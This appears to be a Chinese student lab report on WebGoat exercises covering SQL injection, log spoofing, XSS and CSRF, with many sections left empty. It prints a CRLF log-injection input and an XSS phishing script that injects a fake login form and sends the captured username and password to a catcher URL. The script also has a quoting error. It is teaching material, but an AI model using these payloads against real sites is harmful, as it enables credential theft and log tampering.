目录
Exp9: Web安全基础
一、基础知识
1.sql注入攻击
- 基本原理:
- 防御方法:
2.XSS跨站脚本攻击
- 基本原理:
- 防御方法:
3.CSRF跨站请求伪造
- 基本原理:
- 防御方法:
二、sql注入
1. 命令注入
2. 数字注入
3. 日志欺骗
- 攻击过程:不法分子通过在注入脚本,通过脚本修改日志文件。
-
实验过程:
- 在实验环境提供的表单中输入
2329%0d%0aLogin Succeeded for username: 162329
其中%0d
和%0a
为回车符和换行符。 - 结果如下图:
- 在实验环境提供的表单中输入
三、XSS攻击
1. XSS钓鱼攻击
- 攻击过程:通过表单输入脚本,修改网页HTML,生成钓鱼网站,当用户输入时获取用户输入的信息。
-
实验过程:
<form> <br><br><HR><H3>This feature requires account login:</H3 ><br><br> Enter Username:<br><input type="text" id="user" name="user"><br> Enter Password:<br><input type="password" name = "pass"><br> </form><br><br><HR> <script> function hack() { alert("Had this been a real attack... Your credentials were just stolen." User Name = " + document.forms[0].user.value + "Password = " + document.forms[0].pass.value); XSSImage=new Image; XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user="+ document.forms[0].user.value + "&password=" + document.forms[0].pass.value + "; } </script>
- 将以上代码输入搜索框中,点击搜索如图:
- 当用户点击提交时攻击者界面会出现如下图:
四、CSRF攻击
1. 跨站请求伪造
- 攻击过程:
- 实验过程:
五、实验总结与体会
通过本次实验真实的感受了什么是sql注入,XSS攻击和CRSF攻击,在实验中了解了其中的流程,也自己总结了对这些攻击的防御方法,感觉受益匪浅。
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。